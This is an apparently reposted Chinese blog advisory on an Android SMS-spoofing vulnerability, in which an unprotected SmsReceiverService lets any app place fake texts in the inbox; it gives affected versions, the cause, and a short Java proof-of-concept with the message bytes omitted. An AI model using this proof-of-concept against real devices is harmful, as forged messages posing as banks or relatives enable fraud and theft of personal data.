Android短信欺诈(Smishing)漏洞
16lz
2021-01-23
本文章由Jack_Jia编写,转载请注明出处。
文章链接:http://blog.csdn.net/jiazhijun/article/details/8631829
作者:Jack_Jia 邮箱:309zhijun@163.com
一、漏洞描述
北卡罗来纳州州立大学研究员日前在进行一项有关智能手机的研究项目中发现了一个存在于Android 平台的“短信欺诈”(Smishing)漏洞,据悉,该漏洞可以允许应用在Android平台上进行短信伪装,且在所有版本的Android软件中都存在这一漏洞。 攻击者可利用漏洞窃取个人资料,攻击者也可以利用漏洞,将自己的手机号码伪装成银行或亲友等号码。
二、影响版本
Froyo (2.2.x), Gingerbread (2.3.x), Ice Cream Sandwich (4.0.x), and Jelly Bean (4.1)
三、漏洞原理
Android系统有一套比较完善的安全体系,权限管理就是其中的一部分。当应用需要操作敏感数据时,需要申请相应的权限。 该系统漏洞能够使攻击者无需申请任何权限发送短信到用户收件箱。 出现该漏洞的原因是Android系统的com.android.mms.transaction.SmsReceiverService系统服务未判断启动服务的调用者,攻击者可以通过该应用发送伪装短信到用户收件箱。本漏洞实质上是一种能力的泄漏。
四、POC代码
Intent intent = new Intent(); byte[] pdus = new byte[]{...}; // the sms pdus bytes intent.setClassName("com.android.mms", "com.android.mms.transaction.SmsReceiverService"); intent.setAction("android.provider.Telephony.SMS_RECEIVED"); intent.putExtra("pdus", new byte[][]{pdus}); this.startService(intent);
开源POC: https://github.com/thomascannon/android-sms-spoof
五、相关链接
http://www.csc.ncsu.edu/faculty/jiang/smishing.html http://www.newhua.com/2012/1109/183383.shtml
更多相关文章
- Android签名漏洞分析
- Google称Android新漏洞对用户影响不大
- Bluebox Security最新提报Android漏洞的初步探讨
- 标题:[资讯]注意!Android惊爆两安全漏洞
- Android adb setuid提权漏洞的分析
- Android 安全 —— 本地拒绝服务漏洞
- Android Root方法原理解析及Hook(一) adbd漏洞
- Android漏洞,WebView漏洞,Web漏洞与Web安全
- 通杀所有系统的硬件漏洞?聊一聊Drammer,Android上的RowHammer攻击